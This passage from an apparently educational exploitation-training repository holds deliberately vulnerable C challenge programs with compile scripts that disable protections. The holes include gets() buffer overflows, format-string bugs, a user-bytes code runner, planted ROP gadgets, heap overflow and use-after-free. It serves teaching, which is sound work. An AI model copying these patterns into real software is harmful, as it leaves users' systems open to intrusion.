\"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | 28 | if(l.hook){ 29 | l.hook(); 30 | } 31 | } 32 | 33 | int menu(){ 34 | char buffer[BUF_SIZE] = {0}; 35 | 36 | printf("[*] menu\n"); 37 | printf("menu - show this menu\n"); 38 | printf("send - send new message\n"); 39 | printf("exit - close program\n"); 40 | 41 | fgets(buffer, BUF_SIZE, stdin); 42 | 43 | if (strcmp(buffer, "menu\n") == 0){ 44 | return 1; 45 | } 46 | else if (strcmp(buffer, "send\n") == 0){ 47 | send(); 48 | return 1; 49 | } 50 | else if (strcmp(buffer, "exit\n") == 0){ 51 | return 0; 52 | } 53 | else{ 54 | printf("Unknown command: %s", buffer); 55 | return 1; 56 | } 57 | 58 | } 59 | 60 | int main(int argc, char **argv){ 61 | setbuf(stdout, NULL); 62 | uid_t uid = geteuid(); 63 | setresuid(uid,uid,uid); 64 | printf("Welcome to ch02!\n"); 65 | while(1){ 66 | if (!(menu())){ 67 | break; 68 | } 69 | printf("\n"); 70 | } 71 | printf("Exiting...\n"); 72 | } 73 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch02/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch02.c -static -no-pie -o $1/ch02 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch02/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch03/ch03.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | char command_string[BUF_SIZE] = "whoami\x00"; 9 | 10 | void secret02(){ 11 | strcpy(command_string, "cat flag\x00"); 12 | printf("secret02 called!\n"); 13 | } 14 | 15 | void secret01(){ 16 | system(command_string); 17 | printf("secret01 called!\n"); 18 | } 19 | 20 | void send(){ 21 | char name[BUF_SIZE] = {0}; 22 | char content[BUF_SIZE] = {0}; 23 | 24 | printf("Creating message\n"); 25 | printf("Enter message name:"); 26 | fgets(name, BUF_SIZE, stdin); 27 | printf("Enter message content:"); 28 | gets(content); 29 | 30 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 31 | } 32 | 33 | int menu(){ 34 | char buffer[BUF_SIZE] = {0}; 35 | 36 | printf("[*] menu\n"); 37 | printf("menu - show this menu\n"); 38 | printf("send - send new message\n"); 39 | printf("exit - close program\n"); 40 | 41 | fgets(buffer, BUF_SIZE, stdin); 42 | 43 | if (strcmp(buffer, "menu\n") == 0){ 44 | return 1; 45 | } 46 | else if (strcmp(buffer, "send\n") == 0){ 47 | send(); 48 | return 1; 49 | } 50 | else if (strcmp(buffer, "exit\n") == 0){ 51 | return 0; 52 | } 53 | else{ 54 | printf("Unknown command: %s", buffer); 55 | return 1; 56 | } 57 | 58 | } 59 | 60 | int main(int argc, char **argv){ 61 | setbuf(stdout, NULL); 62 | uid_t uid = geteuid(); 63 | setresuid(uid,uid,uid); 64 | printf("Welcome to ch03!\n"); 65 | while(1){ 66 | if (!(menu())){ 67 | break; 68 | } 69 | printf("\n"); 70 | } 71 | printf("Exiting...\n"); 72 | } 73 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch03/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch03.c -static -fno-stack-protector -no-pie -o $1/ch03 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch03/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch04/ch04.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | char content[BUF_SIZE*2] = "dummy"; 9 | char perm[BUF_SIZE*2] = "user"; 10 | 11 | void secret(){ 12 | system("cat flag"); 13 | } 14 | 15 | void send(){ 16 | char name[BUF_SIZE] = {0}; 17 | printf("Creating message\n"); 18 | printf("Enter message name:"); 19 | fgets(name, BUF_SIZE*2, stdin); 20 | printf("Enter message content:"); 21 | gets(content); 22 | 23 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 24 | if(strcmp(perm, "root") == 0){ 25 | secret(); 26 | } 27 | } 28 | 29 | int menu(){ 30 | char buffer[BUF_SIZE] = {0}; 31 | 32 | printf("[*] menu\n"); 33 | printf("menu - show this menu\n"); 34 | printf("send - send new message\n"); 35 | printf("exit - close program\n"); 36 | 37 | fgets(buffer, BUF_SIZE, stdin); 38 | 39 | if (strcmp(buffer, "menu\n") == 0){ 40 | return 1; 41 | } 42 | else if (strcmp(buffer, "send\n") == 0){ 43 | send(); 44 | return 1; 45 | } 46 | else if (strcmp(buffer, "exit\n") == 0){ 47 | return 0; 48 | } 49 | else{ 50 | printf("Unknown command: %s", buffer); 51 | return 1; 52 | } 53 | 54 | } 55 | 56 | int main(int argc, char **argv){ 57 | setbuf(stdout, NULL); 58 | uid_t uid = geteuid(); 59 | setresuid(uid,uid,uid); 60 | printf("Welcome to ch04!\n"); 61 | while(1){ 62 | if (!(menu())){ 63 | break; 64 | } 65 | printf("\n"); 66 | } 67 | printf("Exiting...\n"); 68 | } 69 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch04/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch04.c -static -no-pie -o $1/ch04 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch04/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch05/ch05.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | char name[BUF_SIZE*2] = {0}; 14 | char content[BUF_SIZE*2] = {0}; 15 | 16 | printf("Creating message\n"); 17 | printf("Enter message name:"); 18 | fgets(name, BUF_SIZE*2, stdin); 19 | printf("Enter message content:"); 20 | fgets(content, BUF_SIZE*2, stdin); 21 | 22 | printf("name: \"%s\"\ncontent:\"", name); 23 | printf(content); 24 | printf("\"\n"); 25 | } 26 | 27 | int menu(){ 28 | char buffer[BUF_SIZE] = {0}; 29 | 30 | printf("[*] menu\n"); 31 | printf("menu - show this menu\n"); 32 | printf("send - send new message\n"); 33 | printf("exit - close program\n"); 34 | 35 | fgets(buffer, BUF_SIZE, stdin); 36 | 37 | if (strcmp(buffer, "menu\n") == 0){ 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "send\n") == 0){ 41 | send(); 42 | return 1; 43 | } 44 | else if (strcmp(buffer, "exit\n") == 0){ 45 | return 0; 46 | } 47 | else{ 48 | printf("Unknown command: %s", buffer); 49 | return 1; 50 | } 51 | 52 | } 53 | 54 | int main(int argc, char **argv){ 55 | setbuf(stdout, NULL); 56 | uid_t uid = geteuid(); 57 | setresuid(uid,uid,uid); 58 | printf("Welcome to ch05!\n"); 59 | while(1){ 60 | if (!(menu())){ 61 | break; 62 | } 63 | printf("\n"); 64 | } 65 | printf("Exiting...\n"); 66 | exit(1); 67 | } 68 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch05/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch05.c -static -no-pie -o $1/ch05 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch05/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch06/ch06.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | #define BUF_SIZE 50 9 | #define PAGE_SIZE 4096 10 | 11 | void runner(){ 12 | char content[PAGE_SIZE]; 13 | char *code; 14 | 15 | printf("Enter byte to run:"); 16 | fgets(content, PAGE_SIZE, stdin); 17 | 18 | code = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); 19 | memcpy(code, content, PAGE_SIZE); 20 | 21 | mprotect(code, PAGE_SIZE, PROT_READ|PROT_EXEC); 22 | 23 | void (*func)() = (void (*)())code; 24 | func(); 25 | 26 | munmap(code, PAGE_SIZE); 27 | } 28 | 29 | void send(){ 30 | char name[BUF_SIZE] = {0}; 31 | char content[BUF_SIZE] = {0}; 32 | 33 | printf("Creating message\n"); 34 | printf("Enter message name:"); 35 | fgets(name, BUF_SIZE, stdin); 36 | printf("Enter message content:"); 37 | fgets(content, BUF_SIZE, stdin); 38 | 39 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 40 | } 41 | 42 | int menu(){ 43 | char buffer[BUF_SIZE] = {0}; 44 | 45 | printf("[*] menu\n"); 46 | printf("menu - show this menu\n"); 47 | printf("send - send new message\n"); 48 | printf("runner - run bytes\n"); 49 | printf("exit - close program\n"); 50 | 51 | fgets(buffer, BUF_SIZE, stdin); 52 | 53 | if (strcmp(buffer, "menu\n") == 0){ 54 | return 1; 55 | } 56 | else if (strcmp(buffer, "send\n") == 0){ 57 | send(); 58 | return 1; 59 | } 60 | else if (strcmp(buffer, "runner\n") == 0){ 61 | runner(); 62 | return 1; 63 | } 64 | else if (strcmp(buffer, "exit\n") == 0){ 65 | return 0; 66 | } 67 | else{ 68 | printf("Unknown command: %s", buffer); 69 | return 1; 70 | } 71 | 72 | } 73 | 74 | int main(int argc, char **argv){ 75 | setbuf(stdout, NULL); 76 | uid_t uid = geteuid(); 77 | setresuid(uid,uid,uid); 78 | printf("Welcome to ch06!\n"); 79 | while(1){ 80 | if (!(menu())){ 81 | break; 82 | } 83 | printf("\n"); 84 | } 85 | printf("Exiting...\n"); 86 | } 87 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch06/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch06.c -static -no-pie -o $1/ch06 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch06/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch07/ch07.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | char command_string[BUF_SIZE] = "cat flag\x00"; 9 | 10 | void func(){ 11 | system("whoami"); 12 | } 13 | 14 | void gadget(){ 15 | __asm__("pop {r0,pc}\n"); 16 | } 17 | 18 | void send(){ 19 | char name[BUF_SIZE] = {0}; 20 | char content[BUF_SIZE] = {0}; 21 | 22 | printf("Creating message\n"); 23 | printf("Enter message name:"); 24 | fgets(name, BUF_SIZE, stdin); 25 | printf("Enter message content:"); 26 | gets(content); 27 | 28 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 29 | } 30 | 31 | int menu(){ 32 | char buffer[BUF_SIZE] = {0}; 33 | 34 | printf("[*] menu\n"); 35 | printf("menu - show this menu\n"); 36 | printf("send - send new message\n"); 37 | printf("exit - close program\n"); 38 | 39 | fgets(buffer, BUF_SIZE, stdin); 40 | 41 | if (strcmp(buffer, "menu\n") == 0){ 42 | return 1; 43 | } 44 | else if (strcmp(buffer, "send\n") == 0){ 45 | send(); 46 | return 1; 47 | } 48 | else if (strcmp(buffer, "exit\n") == 0){ 49 | return 0; 50 | } 51 | else{ 52 | printf("Unknown command: %s", buffer); 53 | return 1; 54 | } 55 | 56 | } 57 | 58 | int main(int argc, char **argv){ 59 | setbuf(stdout, NULL); 60 | uid_t uid = geteuid(); 61 | setresuid(uid,uid,uid); 62 | printf("Welcome to ch07!\n"); 63 | while(1){ 64 | if (!(menu())){ 65 | break; 66 | } 67 | printf("\n"); 68 | } 69 | printf("Exiting...\n"); 70 | } 71 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch07/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch07.c -static -fno-stack-protector -no-pie -o $1/ch07 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch07/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch08/ch08.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void func(){ 9 | system("whoami"); 10 | } 11 | 12 | void send(){ 13 | char name[BUF_SIZE] = {0}; 14 | char content[BUF_SIZE] = {0}; 15 | 16 | printf("Creating message\n"); 17 | printf("Enter message name:"); 18 | fgets(name, BUF_SIZE, stdin); 19 | printf("Enter message content:"); 20 | gets(content); 21 | 22 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 23 | } 24 | 25 | int menu(){ 26 | char buffer[BUF_SIZE] = {0}; 27 | 28 | printf("[*] menu\n"); 29 | printf("menu - show this menu\n"); 30 | printf("send - send new message\n"); 31 | printf("exit - close program\n"); 32 | 33 | fgets(buffer, BUF_SIZE, stdin); 34 | 35 | if (strcmp(buffer, "menu\n") == 0){ 36 | return 1; 37 | } 38 | else if (strcmp(buffer, "send\n") == 0){ 39 | send(); 40 | return 1; 41 | } 42 | else if (strcmp(buffer, "exit\n") == 0){ 43 | return 0; 44 | } 45 | else{ 46 | printf("Unknown command: %s", buffer); 47 | return 1; 48 | } 49 | 50 | } 51 | 52 | int main(int argc, char **argv){ 53 | setbuf(stdout, NULL); 54 | uid_t uid = geteuid(); 55 | setresuid(uid,uid,uid); 56 | printf("Welcome to ch08!\n"); 57 | while(1){ 58 | if (!(menu())){ 59 | break; 60 | } 61 | printf("\n"); 62 | } 63 | printf("Exiting...\n"); 64 | } 65 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch08/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch08.c -static -fno-stack-protector -no-pie -o $1/ch08 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch08/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch09/ch09.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | int admin = 0; 9 | char command_string[BUF_SIZE] = "whoami\x00"; 10 | 11 | void write_anywhere(){ 12 | __asm__("str r0, [r1]"); 13 | printf("write_anywhere!\n"); 14 | } 15 | 16 | void gadget(){ 17 | __asm__("pop {r0,r1,pc}"); 18 | } 19 | 20 | void authenticate(){ 21 | uid_t uid = geteuid(); 22 | strcpy(command_string, "cat flag\x00"); 23 | if (admin == 1){ 24 | setresuid(uid,uid,uid); 25 | system(command_string); 26 | } 27 | printf("You are not admin!\n"); 28 | } 29 | 30 | void send(){ 31 | char name[BUF_SIZE] = {0}; 32 | char content[BUF_SIZE] = {0}; 33 | 34 | printf("Creating message\n"); 35 | printf("Enter message name:"); 36 | fgets(name, BUF_SIZE, stdin); 37 | printf("Enter message content:"); 38 | gets(content); 39 | 40 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 41 | } 42 | 43 | int menu(){ 44 | char buffer[BUF_SIZE] = {0}; 45 | 46 | printf("[*] menu\n"); 47 | printf("menu - show this menu\n"); 48 | printf("send - send new message\n"); 49 | printf("exit - close program\n"); 50 | 51 | fgets(buffer, BUF_SIZE, stdin); 52 | 53 | if (strcmp(buffer, "menu\n") == 0){ 54 | return 1; 55 | } 56 | else if (strcmp(buffer, "send\n") == 0){ 57 | send(); 58 | return 1; 59 | } 60 | else if (strcmp(buffer, "admin\n") == 0){ 61 | authenticate(); 62 | return 1; 63 | } 64 | else if (strcmp(buffer, "exit\n") == 0){ 65 | return 0; 66 | } 67 | else{ 68 | printf("Unknown command: %s", buffer); 69 | return 1; 70 | } 71 | 72 | } 73 | 74 | int main(int argc, char **argv){ 75 | setbuf(stdout, NULL); 76 | printf("Welcome to ch09!\n"); 77 | while(1){ 78 | if (!(menu())){ 79 | break; 80 | } 81 | printf("\n"); 82 | } 83 | printf("Exiting...\n"); 84 | } 85 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch09/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch09.c -static -fno-stack-protector -no-pie -o $1/ch09 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch09/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch10/ch10.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void send(){ 9 | char name[BUF_SIZE] = {0}; 10 | char content[BUF_SIZE] = {0}; 11 | 12 | printf("Creating message\n"); 13 | printf("Enter message name:"); 14 | fgets(name, BUF_SIZE, stdin); 15 | printf("Enter message content:"); 16 | gets(content); 17 | 18 | printf("name: \""); 19 | printf(name); 20 | printf("\"\ncontent:\"%s\"\n", content); 21 | } 22 | 23 | int menu(){ 24 | char buffer[BUF_SIZE] = {0}; 25 | 26 | printf("[*] menu\n"); 27 | printf("menu - show this menu\n"); 28 | printf("send - send new message\n"); 29 | printf("exit - close program\n"); 30 | 31 | fgets(buffer, BUF_SIZE, stdin); 32 | 33 | if (strcmp(buffer, "menu\n") == 0){ 34 | return 1; 35 | } 36 | else if (strcmp(buffer, "send\n") == 0){ 37 | send(); 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "exit\n") == 0){ 41 | return 0; 42 | } 43 | else{ 44 | printf("Unknown command: %s", buffer); 45 | return 1; 46 | } 47 | 48 | } 49 | 50 | int main(int argc, char **argv){ 51 | setbuf(stdout, NULL); 52 | uid_t uid = geteuid(); 53 | setresuid(uid,uid,uid); 54 | printf("Welcome to ch10!\n"); 55 | while(1){ 56 | if (!(menu())){ 57 | break; 58 | } 59 | printf("\n"); 60 | } 61 | printf("Exiting...\n"); 62 | } 63 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch10/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch10.c -static -fno-stack-protector -z execstack -no-pie -o $1/ch10 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch10/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch11/ch11.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | typedef struct{ 9 | char name[BUF_SIZE]; 10 | char content[BUF_SIZE]; 11 | } message; 12 | 13 | typedef struct{ 14 | char junk01[BUF_SIZE]; 15 | char junk02[BUF_SIZE]; 16 | void (*func_ptr)(); 17 | } important; 18 | 19 | void secret(){ 20 | system("cat flag"); 21 | } 22 | 23 | void send(){ 24 | 25 | message* msg = (message*) malloc(sizeof(message)); 26 | important* object_01 = (important*) malloc(sizeof(important)); 27 | 28 | printf("Creating message\n"); 29 | printf("Enter message name:"); 30 | fgets(msg->name, BUF_SIZE, stdin); 31 | printf("Enter message content:"); 32 | gets(msg->content); 33 | 34 | if (object_01->func_ptr){ 35 | object_01->func_ptr(); 36 | } 37 | 38 | printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content); 39 | } 40 | 41 | int menu(){ 42 | char buffer[BUF_SIZE] = {0}; 43 | 44 | printf("[*] menu\n"); 45 | printf("menu - show this menu\n"); 46 | printf("send - send new message\n"); 47 | printf("exit - close program\n"); 48 | 49 | fgets(buffer, BUF_SIZE, stdin); 50 | 51 | if (strcmp(buffer, "menu\n") == 0){ 52 | return 1; 53 | } 54 | else if (strcmp(buffer, "send\n") == 0){ 55 | send(); 56 | return 1; 57 | } 58 | else if (strcmp(buffer, "exit\n") == 0){ 59 | return 0; 60 | } 61 | else{ 62 | printf("Unknown command: %s", buffer); 63 | return 1; 64 | } 65 | 66 | } 67 | 68 | int main(int argc, char **argv){ 69 | setbuf(stdout, NULL); 70 | uid_t uid = geteuid(); 71 | setresuid(uid,uid,uid); 72 | printf("Welcome to ch11!\n"); 73 | while(1){ 74 | if (!(menu())){ 75 | break; 76 | } 77 | printf("\n"); 78 | } 79 | printf("Exiting...\n"); 80 | } 81 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch11/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch11.c -static -no-pie -o $1/ch11 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch11/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch12/ch12.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | typedef struct{ 9 | char name[BUF_SIZE]; 10 | char content[BUF_SIZE]; 11 | } message; 12 | 13 | typedef struct{ 14 | char junk01[BUF_SIZE]; 15 | char junk02[BUF_SIZE]; 16 | void (*func_ptr)(); 17 | } important; 18 | 19 | important* work; 20 | 21 | void func(){ 22 | printf("[*] Working\n"); 23 | } 24 | 25 | void secret(){ 26 | system("cat flag"); 27 | } 28 | 29 | void create_worker(){ 30 | work = (important*) malloc(sizeof(important)); 31 | work->func_ptr = func; 32 | printf("Worker Created in %p\n", work); 33 | } 34 | 35 | void start_worker(){ 36 | work->func_ptr(); 37 | } 38 | 39 | void free_worker(){ 40 | free(work); 41 | } 42 | 43 | void send(){ 44 | message* msg = (message*) malloc(sizeof(message)); 45 | printf("Message Created in %p\n", msg); 46 | 47 | printf("Creating message\n"); 48 | printf("Enter message name:"); 49 | fgets(msg->name, BUF_SIZE, stdin); 50 | printf("Enter message content:"); 51 | gets(msg->content); 52 | printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content); 53 | } 54 | 55 | int menu(){ 56 | char buffer[BUF_SIZE] = {0}; 57 | 58 | printf("[*] menu\n"); 59 | printf("menu - show this menu\n"); 60 | printf("send - send new message\n"); 61 | printf("create_worker - create worker\n"); 62 | printf("start_worker - run worker\n"); 63 | printf("free_worker - free current worker\n"); 64 | printf("exit - close program\n"); 65 | 66 | fgets(buffer, BUF_SIZE, stdin); 67 | 68 | if (strcmp(buffer, "menu\n") == 0){ 69 | return 1; 70 | } 71 | else if (strcmp(buffer, "create_worker\n") == 0){ 72 | create_worker(); 73 | return 1; 74 | } 75 | else if (strcmp(buffer, "start_worker\n") == 0){ 76 | start_worker(); 77 | return 1; 78 | } 79 | else if (strcmp(buffer, "free_worker\n") == 0){ 80 | free_worker(); 81 | return 1; 82 | } 83 | else if (strcmp(buffer, "send\n") == 0){ 84 | send(); 85 | return 1; 86 | } 87 | else if (strcmp(buffer, "exit\n") == 0){ 88 | return 0; 89 | } 90 | else{ 91 | printf("Unknown command: %s", buffer); 92 | return 1; 93 | } 94 | 95 | } 96 | 97 | int main(int argc, char **argv){ 98 | setbuf(stdout, NULL); 99 | uid_t uid = geteuid(); 100 | setresuid(uid,uid,uid); 101 | printf("Welcome to ch12!\n"); 102 | while(1){ 103 | if (!(menu())){ 104 | break; 105 | } 106 | printf("\n"); 107 | } 108 | printf("Exiting...\n"); 109 | } 110 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch12/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch12.c -static -no-pie -o $1/ch12 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch12/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/motd: -------------------------------------------------------------------------------- 1 | 2 | ZenySec 3 | 4 | 5 | -------------------------------------------------------------------------------- /exercises-arm32v7/welcome/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/welcome.c -no-pie -o $1/welcome 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/welcome/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/welcome/welcome.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | int main(int argc, char **argv){ 7 | uid_t uid = geteuid(); 8 | setresuid(uid,uid,uid); 9 | system("cat flag"); 10 | } 11 | -------------------------------------------------------------------------------- /exercises-i386/banner: -------------------------------------------------------------------------------- 1 | 2 | ███████╗███████╗███╗ ██╗██╗ ██╗███████╗███████╗ ██████╗ 3 | ╚══███╔╝██╔════╝████╗ ██║╚██╗ ██╔╝██╔════╝██╔════╝██╔════╝ 4 | ███╔╝ █████╗ ██╔██╗ ██║ ╚████╔╝ ███████╗█████╗ ██║ 5 | ███╔╝ ██╔══╝ ██║╚██╗██║ ╚██╔╝ ╚════██║██╔══╝ ██║ 6 | ███████╗███████╗██║ ╚████║ ██║ ███████║███████╗╚██████╗ 7 | ╚══════╝╚══════╝╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚══════╝ ╚═════╝ 8 | 9 | ██╗██████╗ █████╗ ██████╗ 10 | ██║╚════██╗██╔══██╗██╔════╝ 11 | ██║ █████╔╝╚█████╔╝███████╗ 12 | ██║ ╚═══██╗██╔══██╗██╔═══██╗ 13 | ██║██████╔╝╚█████╔╝╚██████╔╝ 14 | ╚═╝╚═════╝ ╚════╝ ╚═════╝ 15 | 16 | ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ 17 | ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ 18 | █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ███████║ ██║ ██║██║ ██║██╔██╗ ██║ 19 | ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ 20 | ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ 21 | ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ 22 | 23 | ███████╗██╗ ██╗███████╗██████╗ ██████╗██╗███████╗███████╗███████╗ 24 | ██╔════╝╚██╗██╔╝██╔════╝██╔══██╗██╔════╝██║██╔════╝██╔════╝██╔════╝ 25 | █████╗ ╚███╔╝ █████╗ ██████╔╝██║ ██║███████╗█████╗ ███████╗ 26 | ██╔══╝ ██╔██╗ ██╔══╝ ██╔══██╗██║ ██║╚════██║██╔══╝ ╚════██║ 27 | ███████╗██╔╝ ██╗███████╗██║ ██║╚██████╗██║███████║███████╗███████║ 28 | ╚══════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝╚══════╝╚══════╝╚══════╝ 29 | -------------------------------------------------------------------------------- /exercises-i386/ch00/ch00.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | char value; 17 | }; 18 | struct locals l = {.value = 0, .content = {0}, .name = {0}}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | if(l.value == 0x7){ 28 | secret(); 29 | } 30 | } 31 | 32 | int menu(){ 33 | char buffer[BUF_SIZE] = {0}; 34 | 35 | printf("[*] menu\n"); 36 | printf("menu - show this menu\n"); 37 | printf("send - send new message\n"); 38 | printf("exit - close program\n"); 39 | 40 | fgets(buffer, BUF_SIZE, stdin); 41 | 42 | if (strcmp(buffer, "menu\n") == 0){ 43 | return 1; 44 | } 45 | else if (strcmp(buffer, "send\n") == 0){ 46 | send(); 47 | return 1; 48 | } 49 | else if (strcmp(buffer, "exit\n") == 0){ 50 | return 0; 51 | } 52 | else{ 53 | printf("Unknown command: %s", buffer); 54 | return 1; 55 | } 56 | 57 | } 58 | 59 | int main(int argc, char **argv){ 60 | setbuf(stdout, NULL); 61 | uid_t uid = geteuid(); 62 | setresuid(uid,uid,uid); 63 | printf("Welcome to ch00!\n"); 64 | while(1){ 65 | if (!(menu())){ 66 | break; 67 | } 68 | printf("\n"); 69 | } 70 | printf("Exiting...\n"); 71 | } 72 | -------------------------------------------------------------------------------- /exercises-i386/ch00/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch00.c -static -no-pie -o $1/ch00 2 | -------------------------------------------------------------------------------- /exercises-i386/ch00/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch01/ch01.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | char admin[BUF_SIZE]; 17 | }; 18 | struct locals l = {.name = {0}, .content = {0}, .admin = "false"}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | 